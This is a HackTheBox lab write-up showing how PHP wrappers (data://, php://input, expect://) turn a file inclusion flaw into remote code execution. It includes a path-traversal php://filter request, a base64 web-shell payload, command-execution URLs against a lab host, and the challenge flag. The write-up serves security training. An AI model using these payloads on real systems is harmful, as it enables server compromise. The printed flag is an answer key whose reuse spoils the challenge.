HackTheBox — File Inclusion: PHP wrappers for Remote Code Execution
Data
- Data wrappers can be used to include external data, including PHP code.
- The application must have
allow_url_include
enabled, in the config file, which is located in/etc/php/X.Y/apache2/php.ini
(Apache) or/etc/php/X.Y/fpm/php.ini
(Nginx) whereX.Y
is the PHP version. - Use
php://filter
to check the config file
curl "http://83.136.253.251:30919/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
- Once we find
allow_url_include
enabled, we can proceed to include external PHP code in the application'<?php system($_GET["cmd"]); ?>'
(Note we need to encode the code first)
echo '<?php system($_GET["cmd"]); ?>' | base64
http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
base64 & text/plain: allows the application to intake encoded strings and decode them.
Input
- Input wrapper is similar to Data wrapper, which allows external resources. The only difference is that we must use input wrapper must be used with POST request
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
- Input wrapper is usually used when an application does not accept GET request. If that’s the case, we need to modify the above command as
system($_GET[“cmd”])
does not work. Instead, we use<\?php system('id')?>
)
Expect
- Expect allows users to run command directly via URL stream (without creating the web shell like the other 2 wrappers).
- Expect must be installed and enabled in the application. We can check this by doing the same thing as we do to identify Data wrapper, except that now we
grep | expect
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep expect
extension=expect
- Using expect to execute commands on the application:
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
Answer the question
Try to gain RCE using one of the PHP wrappers and read the flag at /
- First, we check if Data & Expect wrappers are enabled on the application
curl "http://83.136.253.251:30919/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
- We see that both
expect extension
andallow_url_include
are enabled. - Use either one to get the flag. I’ll use the
data
filter.
# Running "ls /" command
http://83.136.253.251:30919/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls%20/
# Display content of the flag
http://83.136.253.251:30919/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat%20/37809e2f8952f06139011994726d9ef1.txt
Answer: HTB{d!$46l3_r3m0t3_url_!nclud3}
Conclusion
- These are the most common PHP wrappers that will be used to perform Local File Inclusion attacks and some Remote Code Execution.
- Please clap if you like this post. And don’t forget to follow me for more Cybersecurity content.